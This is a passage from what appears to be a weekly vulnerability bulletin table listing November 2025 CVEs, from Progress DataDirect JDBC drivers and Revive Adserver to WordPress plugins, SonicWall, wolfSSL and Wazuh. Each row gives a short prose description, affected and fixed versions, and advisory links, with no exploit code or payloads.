8.1.0.0183 DataDirect OpenAccess JDBC Driver: through 9.0.0.0019, fixed in 9.0.0.0022 | 2025-11-19 | not yet calculated | CVE-2025-10702 | https://community.progress.com/s/article/Progress-DataDirect-Critical-Security-Product-Alert-Bulletin-November-2025 |
| Progress--DataDirect Connect for JDBC for Amazon Redshift | Improper Control of Generation of Code ('Code Injection') vulnerability in Progress DataDirect Connect for JDBC drivers, Progress DataDirect Open Access JDBC driver and Hybrid Data Pipeline allows Remote Code Inclusion. The SpyAttribute connection option implemented by the DataDirect Connect for JDBC drivers, DataDirect Hybrid Data Pipeline JDBC driver and the DataDirect OpenAccess JDBC driver log=(file) construct allows the user to specify an arbitrary file for the JDBC driver to write its log information to. If an application allows an end user to specify a value for the SpyAttributes connection option then an attacker could cause JavaScript to be written to a log file. If the log file was in the correct location with the correct extension, an application server could see that log file as a resource to be served. The attacker could fetch the resource from the server causing the JavaScript to be executed. This issue affects: DataDirect Connect for JDBC for Amazon Redshift: through 6.0.0.001392, fixed in 6.0.0.001541 DataDirect Connect for JDBC for Apache Cassandra: through 6.0.0.000805, fixed in 6.0.0.000833 DataDirect Connect for JDBC for Hive: through 6.0.1.001499, fixed in 6.0.1.001628 DataDirect Connect for JDBC for Apache Impala: through 6.0.0.001155, fixed in 6.0.0.001279 DataDirect Connect for JDBC for Apache SparkSQL: through 6.0.1.001222, fixed in 6.0.1.001344 DataDirect Connect for JDBC Autonomous REST Connector: through 6.0.1.006961, fixed in 6.0.1.007063 DataDirect Connect for JDBC for DB2: through 6.0.0.000717, fixed in 6.0.0.000964 DataDirect Connect for JDBC for Google Analytics 4: through 6.0.0.000454, fixed in 6.0.0.000525 DataDirect Connect for JDBC for Google BigQuery: through 6.0.0.002279, fixed in 6.0.0.002410 DataDirect Connect for JDBC for Greenplum: through 6.0.0.001712, fixed in 6.0.0.001727 DataDirect Connect for JDBC for Informix: through 6.0.0.000690, fixed in 6.0.0.0851 DataDirect Connect for JDBC for Microsoft Dynamics 365: through 6.0.0.003161, fixed in 6.0.0.3198 DataDirect Connect for JDBC for Microsoft SQLServer: through 6.0.0.001936, fixed in 6.0.0.001957 DataDirect Connect for JDBC for Microsoft Sharepoint: through 6.0.0.001559, fixed in 6.0.0.001587 DataDirect Connect for JDBC for MongoDB: through 6.1.0.001654, fixed in 6.1.0.001669 DataDirect Connect for JDBC for MySQL: through 5.1.4.000330, fixed in 5.1.4.000364 DataDirect Connect for JDBC for Oracle Database: through 6.0.0.001747, fixed in 6.0.0.001776 DataDirect Connect for JDBC for Oracle Eloqua: through 6.0.0.001438, fixed in 6.0.0.001458 DataDirect Connect for JDBC for Oracle Sales Cloud: through 6.0.0.001225, fixed in 6.0.0.001316 DataDirect Connect for JDBC for Oracle Service Cloud: through 5.1.4.000298, fixed in 5.1.4.000309 DataDirect Connect for JDBC for PostgreSQL: through 6.0.0.001843, fixed in 6.0.0.001856 DataDirect Connect for JDBC for Progress OpenEdge: through 5.1.4.000187, fixed in 5.1.4.000189 DataDirect Connect for JDBC for Salesforce: through 6.0.0.003020, fixed in 6.0.0.003125 DataDirect Connect for JDBC for SAP HANA: through 6.0.0.000879, product retired DataDirect Connect for JDBC for SAP S/4 HANA: through 6.0.1.001818, fixed in 6.0.1.001858 DataDirect Connect for JDBC for Sybase ASE: through 5.1.4.000161, fixed in 5.1.4.000162 DataDirect Connect for JDBC for Snowflake: through 6.0.1.001821, fixed in 6.0.1.001856 DataDirect Hybrid Data Pipeline Server: through 4.6.2.3309, fixed in 4.6.2.3430 DataDirect Hybrid Data Pipeline JDBC Driver: through 4.6.2.0607, fixed in 4.6.2.1023 DataDirect Hybrid Data Pipeline On Premises Connector: through 4.6.2.1223, fixed in 4.6.2.1339 DataDirect Hybrid Data Pipeline Docker: through 4.6.2.3316, fixed in 4.6.2.3430 DataDirect OpenAccess JDBC Driver: through 8.1.0.0177, fixed in 8.1.0.0183 DataDirect OpenAccess JDBC Driver: through 9.0.0.0019, fixed in 9.0.0.0022 | 2025-11-19 | not yet calculated | CVE-2025-10703 | https://community.progress.com/s/article/Progress-DataDirect-Critical-Security-Product-Alert-Bulletin-November-2025 |
| Property Hive--PropertyHive | Missing Authorization vulnerability in Property Hive PropertyHive propertyhive allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PropertyHive: from n/a through <= 2.1.12. | 2025-11-21 | not yet calculated | CVE-2025-66087 | https://vdp.patchstack.com/database/Wordpress/Plugin/propertyhive/vulnerability/wordpress-propertyhive-plugin-2-1-12-broken-access-control-vulnerability?_s_id=cve   |
| Revive--Revive Adserver | Authorization bypass in Revive Adserver 5.5.2 and 6.0.1 and earlier versions allows a logged-in attacker to change other users' email addresses and potentially take over their accounts using the forgot-password functionality. | 2025-11-20 | not yet calculated | CVE-2025-48986 | https://hackerone.com/reports/3398283   |
| Revive--Revive Adserver | Improper Neutralization of Input in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes a potential reflected XSS attack. | 2025-11-20 | not yet calculated | CVE-2025-48987 | https://hackerone.com/reports/3399191   |
| Revive--Revive Adserver | Improper neutralisation of format characters in the settings of Revive Adserver 5.5.2 and 6.0.1 and earlier versions allows an administrator user to disable the admin user console by triggering a fatal PHP error. | 2025-11-20 | not yet calculated | CVE-2025-52666 | https://hackerone.com/reports/3399218   |
| Revive--Revive Adserver | Missing JSON Content-Type header in a script in Revive Adserver 6.0.1 and 5.5.2 and earlier versions makes a stored XSS attack possible for a logged-in manager user. | 2025-11-20 | not yet calculated | CVE-2025-52667 | https://hackerone.com/reports/3399809   |
| Revive--Revive Adserver | Improper input neutralization in the stats-conversions.php script in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes potential information disclosure and session hijacking via a stored XSS attack. | 2025-11-20 | not yet calculated | CVE-2025-52668 | https://hackerone.com/reports/3400506   |
| Revive--Revive Adserver | Insecure design policies in the user management system of Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes non-admin users to have access to the contact name and email address of other users on the system. | 2025-11-20 | not yet calculated | CVE-2025-52669 | https://hackerone.com/reports/3401464   |
| Revive--Revive Adserver | Missing authorization check in Revive Adserver 5.5.2 and 6.0.1 and earlier versions allows users on the system to delete banners owned by other accounts. | 2025-11-20 | not yet calculated | CVE-2025-52670 | https://hackerone.com/reports/3401612   |
| Revive--Revive Adserver | Debug information disclosure in the SQL error message in Revive Adserver 5.5.2 and 6.0.1 and earlier versions allows non-admin users to obtain information about the software, PHP and database versions currently in use. | 2025-11-20 | not yet calculated | CVE-2025-52671 | https://hackerone.com/reports/3403450   |
| Revive--Revive Adserver | Improper neutralization of input in Revive Adserver 5.5.2 and 6.0.1 and earlier versions causes manager accounts to be able to craft XSS attacks to their own advertiser users. | 2025-11-20 | not yet calculated | CVE-2025-55123 | https://hackerone.com/reports/3404968   |
| Revive--Revive Adserver | Improper neutralisation of input in Revive Adserver 6.0.0+ causes a reflected XSS attack in the banner-zone.php script. | 2025-11-20 | not yet calculated | CVE-2025-55124 | https://hackerone.com/reports/3403727   |
| Revive--Revive Adserver | HackerOne community member Dang Hung Vi (vidang04) has reported a stored XSS vulnerability involving the navigation box at the top of advertiser-related pages, with campaign names being the vector for the stored XSS. | 2025-11-20 | not yet calculated | CVE-2025-55126 | https://hackerone.com/reports/3411750   |
| Revive--Revive Adserver | HackerOne community member Dao Hoang Anh (yoyomiski) has reported an improper neutralization of whitespace in the username when adding new users. A username with leading or trailing whitespace could be virtually indistinguishable from its legitimate counterpart when the username is displayed in the UI, potentially leading to confusion. | 2025-11-20 | not yet calculated | CVE-2025-55127 | https://hackerone.com/reports/3413764   |
| Revive--Revive Adserver | HackerOne community member Dao Hoang Anh (yoyomiski) has reported an uncontrolled resource consumption vulnerability in "userlog-index.php". An attacker with access to the admin interface could request an arbitrarily large number of items per page, potentially leading to a denial of service. | 2025-11-20 | not yet calculated | CVE-2025-55128 | https://hackerone.com/reports/3413890   |
| Sabuj Kundu--CBX Bookmark & Favorite | Missing Authorization vulnerability in Sabuj Kundu CBX Bookmark & Favorite cbxwpbookmark allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects CBX Bookmark & Favorite: from n/a through <= 2.0.1. | 2025-11-21 | not yet calculated | CVE-2025-66101 | https://vdp.patchstack.com/database/Wordpress/Plugin/cbxwpbookmark/vulnerability/wordpress-cbx-bookmark-favorite-plugin-2-0-1-broken-access-control-vulnerability?_s_id=cve   |
| Scott Paterson--Subscriptions & Memberships for PayPal | Missing Authorization vulnerability in Scott Paterson Subscriptions & Memberships for PayPal subscriptions-memberships-for-paypal allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Subscriptions & Memberships for PayPal: from n/a through <= 1.1.7. | 2025-11-21 | not yet calculated | CVE-2025-66107 | https://vdp.patchstack.com/database/Wordpress/Plugin/subscriptions-memberships-for-paypal/vulnerability/wordpress-subscriptions-memberships-for-paypal-plugin-1-1-7-broken-access-control-vulnerability?_s_id=cve   |
| Shahjahan Jewel--FluentCommunity | Missing Authorization vulnerability in Shahjahan Jewel FluentCommunity fluent-community allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects FluentCommunity: from n/a through <= 2.0.0. | 2025-11-21 | not yet calculated | CVE-2025-66084 | https://vdp.patchstack.com/database/Wordpress/Plugin/fluent-community/vulnerability/wordpress-fluentcommunity-plugin-2-0-0-broken-access-control-vulnerability?_s_id=cve   |
| Shelly--Pro 3EM | Out-of-bounds Read in Shelly Pro 3EM (before v1.4.4) allows Overread Buffers. | 2025-11-19 | not yet calculated | CVE-2025-12056 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-12056 https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-03   |
| Shelly--Pro 4PM | Allocation of Resources Without Limits or Throttling vulnerability in Shelly Pro 4PM (before v1.6) allows Excessive Allocation via network. | 2025-11-19 | not yet calculated | CVE-2025-11243 | https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2025-11243 https://www.nozominetworks.com/blog/shelly-pro-4pm-vulnerabilities https://www.cisa.gov/news-events/ics-advisories/icsa-25-322-02   |
| silabs.com--RS9116W | A Bluetooth device using the RS9116 WiseConnect SDK experiences a denial of service if it receives malformed L2CAP packets; only a hard reset returns the device to normal operation. | 2025-11-17 | not yet calculated | CVE-2025-4321 | https://community.silabs.com/068Vm00000YV9DL   |
| sonalsinha21--SKT Skill Bar | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in sonalsinha21 SKT Skill Bar skt-skill-bar allows DOM-Based XSS.This issue affects SKT Skill Bar: from n/a through <= 2.5. | 2025-11-21 | not yet calculated | CVE-2025-66090 | https://vdp.patchstack.com/database/Wordpress/Plugin/skt-skill-bar/vulnerability/wordpress-skt-skill-bar-plugin-2-5-cross-site-scripting-xss-vulnerability?_s_id=cve   |
| SonicWall--Email Security | Download of Code Without Integrity Check Vulnerability in the SonicWall Email Security appliance loads root filesystem images without verifying signatures, allowing attackers with VMDK or datastore access to modify system files and gain persistent arbitrary code execution. | 2025-11-20 | not yet calculated | CVE-2025-40604 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0018   |
| SonicWall--Email Security | A path traversal vulnerability in the SonicWall Email Security appliance allows an attacker to manipulate file-system paths by injecting crafted directory-traversal sequences (such as ../) and access files and directories outside the intended restricted path. | 2025-11-20 | not yet calculated | CVE-2025-40605 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0018   |
| SonicWall--SonicOS | A Stack-based buffer overflow vulnerability in the SonicOS SSLVPN service allows a remote unauthenticated attacker to cause Denial of Service (DoS), which could cause an impacted firewall to crash. | 2025-11-20 | not yet calculated | CVE-2025-40601 | https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0016   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Broken Access Control in /status endpoint. Due to lack of permission checks in Project Status functionality an authenticated attacker is able to add, edit and delete any status. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62293 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Predictable Generation of Password Recovery Token. Due to weak mechanism of generating recovery tokens, a malicious attacker is able to brute-force all possible values and takeover any account in reasonable amount of time. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62294 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /groupe_form endpoint. Malicious attacker with medium privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when opening editor. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62295 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /taches endpoint. Malicious attacker with medium privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when opening editor. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62296 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /projets endpoint. Malicious attacker with medium privileges can inject arbitrary HTML and JS into website, which will be rendered/executed when opening edited page. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62297 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /status endpoint. Malicious attacker with an account can inject arbitrary HTML and JS into website, which will be rendered/executed when opening multiple pages. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62729 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Privilege Escalation in the user management tab. Users with the user_manage_team role are allowed to modify permissions of users; however, they are able to assign administrative permissions to any user, including themselves. This allows a malicious authenticated attacker with this role to escalate to admin privileges. This issue affects both the Bulk Update functionality and the regular editing of a user's rights and privileges. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62730 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| SOPlanning--SOPlanning | SOPlanning is vulnerable to Stored XSS in /feries endpoint. Malicious attacker with access to public holidays feature is able to inject arbitrary HTML and JS into website, which will be rendered/executed when opening multiple pages. By default only administrators and users with special privileges are able to access this endpoint. This issue was fixed in version 1.55. | 2025-11-20 | not yet calculated | CVE-2025-62731 | https://cert.pl/en/posts/2025/11/CVE-2025-62293 https://www.soplanning.org/en/   |
| Stiofan--UsersWP | Missing Authorization vulnerability in Stiofan UsersWP userswp allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects UsersWP: from n/a through <= 1.2.47. | 2025-11-21 | not yet calculated | CVE-2025-66072 | https://vdp.patchstack.com/database/Wordpress/Plugin/userswp/vulnerability/wordpress-userswp-plugin-1-2-47-broken-access-control-vulnerability?_s_id=cve   |
| SUSE--openSUSE Tumbleweed | An Improper Check for Unusual or Exceptional Conditions vulnerability in OpenSMTPD allows local users to crash OpenSMTPD. This issue affects openSUSE Tumbleweed: from ? before 7.8.0p0-1.1. | 2025-11-20 | not yet calculated | CVE-2025-62875 | https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-62875 https://security.opensuse.org/2025/10/31/opensmtpd-local-DoS.html   |
| Syed Balkhi--Giveaways and Contests by RafflePress | Cross-Site Request Forgery (CSRF) vulnerability in Syed Balkhi Giveaways and Contests by RafflePress rafflepress allows Cross Site Request Forgery.This issue affects Giveaways and Contests by RafflePress: from n/a through <= 1.12.20. | 2025-11-21 | not yet calculated | CVE-2025-66064 | https://vdp.patchstack.com/database/Wordpress/Plugin/rafflepress/vulnerability/wordpress-giveaways-and-contests-by-rafflepress-plugin-1-12-20-cross-site-request-forgery-csrf-vulnerability?_s_id=cve   |
| theme funda--Show Variations as Single Products Woocommerce | Missing Authorization vulnerability in theme funda Show Variations as Single Products Woocommerce woo-show-single-variations-shop-category allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Show Variations as Single Products Woocommerce: from n/a through <= 2.0. | 2025-11-21 | not yet calculated | CVE-2025-66114 | https://vdp.patchstack.com/database/Wordpress/Plugin/woo-show-single-variations-shop-category/vulnerability/wordpress-show-variations-as-single-products-woocommerce-plugin-2-0-broken-access-control-vulnerability?_s_id=cve   |
| ThemeAtelier--Better Chat Support for Messenger | Missing Authorization vulnerability in ThemeAtelier Better Chat Support for Messenger better-chat-support allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Better Chat Support for Messenger: from n/a through <= 1.2.18. | 2025-11-21 | not yet calculated | CVE-2025-66113 | https://vdp.patchstack.com/database/Wordpress/Plugin/better-chat-support/vulnerability/wordpress-better-chat-support-for-messenger-plugin-1-2-18-broken-access-control-vulnerability?_s_id=cve   |
| ThemeAtelier--Chat Help | Missing Authorization vulnerability in ThemeAtelier Chat Help chat-help allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Chat Help: from n/a through <= 3.1.3. | 2025-11-21 | not yet calculated | CVE-2025-66099 | https://vdp.patchstack.com/database/Wordpress/Plugin/chat-help/vulnerability/wordpress-chat-help-plugin-3-1-3-broken-access-control-vulnerability?_s_id=cve   |
| Themeisle--PPOM for WooCommerce | Missing Authorization vulnerability in Themeisle PPOM for WooCommerce woocommerce-product-addon allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects PPOM for WooCommerce: from n/a through <= 33.0.16. | 2025-11-21 | not yet calculated | CVE-2025-66069 | https://vdp.patchstack.com/database/Wordpress/Plugin/woocommerce-product-addon/vulnerability/wordpress-ppom-for-woocommerce-plugin-33-0-16-broken-access-control-vulnerability?_s_id=cve   |
| Times Software--E-Payroll | A value provided in one of the POST parameters sent during login to Times Software E-Payroll is not sanitized properly, which allows an unauthenticated attacker to perform DoS attacks. SQL injection might also be feasible, although so far a working exploit has been prevented, probably by backend filtering mechanisms. Additionally, command-injection attempts cause the application to return extensive error messages disclosing information about the internal infrastructure. Patching status is unknown because the vendor has not replied to messages sent by the CNA. | 2025-11-18 | not yet calculated | CVE-2025-9977 | https://cert.pl/en/posts/2025/11/CVE-2025-9977 https://www.timesoftsg.com.sg/payroll-software/   |
| Tinexta InfoCert S.p.A.--GoSign Desktop | GoSign Desktop versions 2.4.0 and earlier use an unsigned update manifest for distributing application updates. The manifest contains package URLs and SHA-256 hashes but is not digitally signed, so its authenticity relies solely on the underlying TLS channel. In affected versions, TLS certificate validation can be disabled when a proxy is configured, allowing an attacker who can intercept network traffic to supply a malicious update manifest and corresponding package with a matching hash. This can cause the client to download and install a tampered update, resulting in arbitrary code execution with the privileges of the GoSign Desktop user on Windows and macOS, or with elevated privileges on some Linux deployments. A local attacker who can modify proxy settings may also abuse this behavior to escalate privileges by forcing installation of a crafted update. | 2025-11-18 | not yet calculated | CVE-2025-34324 | https://www.ush.it/2025/11/14/multiple-vulnerabilities-gosign-desktop-remote-code-execution/ https://infocert.digital/consumer/gosign-suite/ https://www.vulncheck.com/advisories/gosign-desktop-insecure-update-mechanism-rce https://www.ush.it/2025/11/14/vulnerabilita-multiple-gosign-desktop-esecuzione-remota-codice-arbitrario/   |
| TP-Link System Inc.--TL-WR940N V6 | Improper input validation vulnerability in TP-Link System Inc. TL-WR940N V6 (UPnP modules), which allows unauthenticated adjacent attackers to perform DoS attack. This issue affects TL-WR940N V6 <= Build 220801. | 2025-11-20 | not yet calculated | CVE-2025-11676 | https://www.tp-link.com/us/support/download/tl-wr940n/v6/#Firmware https://www.tp-link.com/en/support/download/tl-wr940n/v6/#Firmware https://www.tp-link.com/en/support/faq/4755/   |
| tychesoftwares--Arconix Shortcodes | Missing Authorization vulnerability in tychesoftwares Arconix Shortcodes arconix-shortcodes allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Arconix Shortcodes: from n/a through <= 2.1.18. | 2025-11-21 | not yet calculated | CVE-2025-66085 | https://vdp.patchstack.com/database/Wordpress/Plugin/arconix-shortcodes/vulnerability/wordpress-arconix-shortcodes-plugin-2-1-18-broken-access-control-vulnerability?_s_id=cve   |
| tychesoftwares--Custom Order Numbers for WooCommerce | Missing Authorization vulnerability in tychesoftwares Custom Order Numbers for WooCommerce custom-order-numbers-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Custom Order Numbers for WooCommerce: from n/a through <= 1.11.0. | 2025-11-21 | not yet calculated | CVE-2025-66071 | https://vdp.patchstack.com/database/Wordpress/Plugin/custom-order-numbers-for-woocommerce/vulnerability/wordpress-custom-order-numbers-for-woocommerce-plugin-1-11-0-broken-access-control-vulnerability?_s_id=cve   |
| Uncanny Owl--Uncanny Automator | Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Uncanny Owl Uncanny Automator uncanny-automator allows Retrieve Embedded Sensitive Data.This issue affects Uncanny Automator: from n/a through < 6.10.0. | 2025-11-21 | not yet calculated | CVE-2025-66056 | https://vdp.patchstack.com/database/Wordpress/Plugin/uncanny-automator/vulnerability/wordpress-uncanny-automator-plugin-6-10-0-sensitive-data-exposure-vulnerability?_s_id=cve   |
| Unknown--attention-bar | The attention-bar WordPress plugin through 0.7.2.1 does not sanitize and escape a parameter before using it in a SQL statement, allowing high privilege users such as administrator to perform SQL injection attacks | 2025-11-20 | not yet calculated | CVE-2025-12502 | https://wpscan.com/vulnerability/75e63134-4c8a-45fd-b7fc-db40644ddb8c/   |
| Unknown--Mstoreapp Mobile App | The Mstoreapp Mobile App WordPress plugin through 2.08 and Mstoreapp Mobile Multivendor through 9.0.1 do not properly verify a user's identity in an AJAX action, allowing unauthenticated users to obtain a valid session for arbitrary users by knowing their email address. | 2025-11-21 | not yet calculated | CVE-2025-11127 | https://wpscan.com/vulnerability/6432bd1a-6e44-4a3f-890b-df2bd877d626/   |
| Unknown--W3 Total Cache | The W3 Total Cache WordPress plugin before 2.8.13 is vulnerable to command injection via the _parse_dynamic_mfunc function, allowing unauthenticated users to execute PHP commands by submitting a comment with a malicious payload to a post. | 2025-11-17 | not yet calculated | CVE-2025-9501 | https://wpscan.com/vulnerability/6697a2c9-63ae-42f0-8931-f2e5d67d45ae/   |
| Unknown--WavePlayer | The WavePlayer WordPress plugin before 3.8.0 lacks an authorization check on an AJAX action and does not validate the file to be copied locally, allowing unauthenticated users to upload arbitrary files to the server, leading to RCE. | 2025-11-19 | not yet calculated | CVE-2025-12057 | https://wpscan.com/vulnerability/110db433-01ec-47ea-b74f-c3faa1757a3c/   |
| upKeeper Solutions--upKeeper Manager | Insertion of Sensitive Information into Log File vulnerability in upKeeper Solutions upKeeper Manager allows Use of Known Domain Credentials.This issue affects upKeeper Manager: from 5.2.0 before 5.2.12. | 2025-11-19 | not yet calculated | CVE-2025-11446 | https://support.upkeeper.se/hc/en-us/articles/23693858370076-CVE-2025-11446-Insertion-of-Sensitive-Information-into-Log-File   |
| Vivotek--Affected device models: FD7131-VVTK, FD7141-VVTK, IP7131-VVTK, IP7133-VVTK, IP7134-VVTK, IP7135-VVTK, IP7137-VVTK, IP7138-VVTK, IP7142-VVTK, IP7151-VVTK, IP7152-VVTK, IP7153-VVTK, IP7154-VVTK, IP7330-VVTK, IP8131-VVTK, IP8131W-VVTK, PT7135-VVTK, PT7137-TCON, PT7137-VVTK, PZ7131-VVTK, PZ71X1-VVTK, PZ71X2-VVTK, SD73X3-VVTK, TC5330-VVTK, TC5332-TCVV, TC5333-TCVV, TC5633-TCVV, TC5633-VVTK, VS7100-VVTK | Legacy Vivotek device firmware uses default credentials for the root and user login accounts. | 2025-11-19 | not yet calculated | CVE-2025-12592 | https://www.akamai.com/blog/security-research/rce-zero-day-in-legacy-vivotek-firmware http://www.vapidlabs.com/advisory.php?v=219   |
| vllm-project--vllm | vLLM is an inference and serving engine for large language models (LLMs). From version 0.5.5 to before 0.11.1, users can crash the vLLM engine serving multimodal models by passing multimodal embedding inputs with correct ndim but incorrect shape (e.g. hidden dimension is wrong), regardless of whether the model is intended to support such inputs (as defined in the Supported Models page). This issue has been patched in version 0.11.1. | 2025-11-21 | not yet calculated | CVE-2025-62372 | https://github.com/vllm-project/vllm/security/advisories/GHSA-pmqf-x6x8-p7qw https://github.com/vllm-project/vllm/pull/27204 https://github.com/vllm-project/vllm/pull/6613 https://github.com/vllm-project/vllm/commit/58fab50d82838d5014f4a14d991fdb9352c9c84b   |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 4.3.0 to before 4.13.0, a missing ACL on "C:\Program Files (x86)\ossec-agent\authd.pass" exposes the password to all "Authenticated Users" on the local machine. This issue has been patched in version 4.13.0. | 2025-11-21 | not yet calculated | CVE-2025-54866 | https://github.com/wazuh/wazuh/security/advisories/GHSA-mvfx-ph7m-qm37 https://github.com/wazuh/wazuh/pull/31187 https://github.com/wazuh/wazuh/commit/606f19e688944ebe5d28d72eb81ac36f8fffb143 https://github.com/wazuh/wazuh/releases/tag/v4.13.0   |
| wazuh--wazuh | Wazuh is a free and open source platform used for threat prevention, detection, and response. From version 3.7.0 to before 4.12.0, fim_alert() implementation does not check whether oldsum->md5 is NULL or not before dereferencing it. A compromised agent can cause a crash of analysisd by sending a specially crafted message to the wazuh manager. This issue has been patched in version 4.12.0. | 2025-11-21 | not yet calculated | CVE-2025-64169 | https://github.com/wazuh/wazuh/security/advisories/GHSA-hc35-h924-8596   |
| wazuh--wazuh-dashboard-plugins | Wazuh is a security detection, visibility, and compliance open source project. From version 4.9.0 to before 4.13.0, the Wazuh API - Agent Configuration in certain configurations allows authenticated users with read-only API roles to retrieve agent enrollment credentials through the /utils/configuration endpoint. These credentials can be used to register new agents within the same Wazuh tenant without requiring elevated permissions through the UI. This issue has been patched in version 4.13.0. | 2025-11-21 | not yet calculated | CVE-2025-64483 | https://github.com/wazuh/wazuh-dashboard-plugins/security/advisories/GHSA-gwf3-8gm3-qrmj   |
| WBCE--WBCE_CMS | WBCE CMS is a content management system. Prior to version 1.6.4, a low-privileged user in WBCE CMS can escalate their privileges to the Administrators group by manipulating the groups[] parameter in the /admin/users/save.php request. The UI restricts users to assigning only their existing group, but server-side validation is missing, allowing attackers to overwrite their group membership and obtain full administrative access. This results in a complete compromise of the CMS. This issue has been patched in version 1.6.4. | 2025-11-19 | not yet calculated | CVE-2025-65094 | https://github.com/WBCE/WBCE_CMS/security/advisories/GHSA-hmmw-4ccm-fx44 https://github.com/WBCE/WBCE_CMS/commit/96046178f4c80cf16f7c224054dec7fdadddda7e   |
| WebToffee--Accessibility Toolkit by WebYes | Missing Authorization vulnerability in WebToffee Accessibility Toolkit by WebYes accessibility-plus allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Accessibility Toolkit by WebYes: from n/a through <= 2.0.4. | 2025-11-21 | not yet calculated | CVE-2025-66112 | https://vdp.patchstack.com/database/Wordpress/Plugin/accessibility-plus/vulnerability/wordpress-accessibility-toolkit-by-webyes-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve   |
| WebToffee--Product Feed for WooCommerce | Missing Authorization vulnerability in WebToffee Product Feed for WooCommerce webtoffee-product-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Product Feed for WooCommerce: from n/a through <= 2.3.1. | 2025-11-21 | not yet calculated | CVE-2025-66089 | https://vdp.patchstack.com/database/Wordpress/Plugin/webtoffee-product-feed/vulnerability/wordpress-product-feed-for-woocommerce-plugin-2-3-1-broken-access-control-vulnerability?_s_id=cve   |
| withastro--astro | Astro is a web framework. Prior to version 5.15.8, a mismatch exists between how Astro normalizes request paths for routing/rendering and how the application's middleware reads the path for validation checks. Astro internally applies decodeURI() to determine which route to render, while the middleware uses context.url.pathname without applying the same normalization (decodeURI). This discrepancy may allow attackers to reach protected routes using encoded path variants that pass routing but bypass validation checks. This issue has been patched in version 5.15.8. | 2025-11-19 | not yet calculated | CVE-2025-64765 | https://github.com/withastro/astro/security/advisories/GHSA-ggxq-hp9w-j794 https://github.com/withastro/astro/commit/6f800813516b07bbe12c666a92937525fddb58ce   |
| wolfSSL--wolfSSL | Improper Input Validation in the TLS 1.3 CKS extension parsing in wolfSSL 5.8.2 and earlier on multiple platforms allows a remote unauthenticated attacker to potentially cause a denial-of-service via a crafted ClientHello message with duplicate CKS extensions. | 2025-11-21 | not yet calculated | CVE-2025-11933 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9132   |
| wolfSSL--wolfSSL | Integer underflow leads to out-of-bounds access in XChaCha20-Poly1305 decrypt. This issue is hit specifically through a call to the function wc_XChaCha20Poly1305_Decrypt(), which is not used for TLS connections, only by direct calls from an application. | 2025-11-21 | not yet calculated | CVE-2025-11931 | https://github.com/wolfSSL/wolfssl/pull/9223   |
| wolfSSL--wolfSSL | The server previously verified the TLS 1.3 PSK binder using a non-constant-time comparison, which could potentially leak information about the PSK binder. | 2025-11-21 | not yet calculated | CVE-2025-11932 | https://github.com/wolfSSL/wolfssl/pull/9223   |
| wolfSSL--wolfSSL | Improper input validation in the TLS 1.3 CertificateVerify signature algorithm negotiation in wolfSSL 5.8.2 and earlier on multiple platforms allows the signature algorithm to be downgraded. For example, when a client sends ECDSA P-521 as its supported signature algorithm, the server could previously respond with ECDSA P-256 as the accepted signature algorithm, and the connection would continue using ECDSA P-256 if the client supports it. | 2025-11-21 | not yet calculated | CVE-2025-11934 | https://github.com/wolfSSL/wolfssl https://github.com/wolfSSL/wolfssl/pull/9113   |
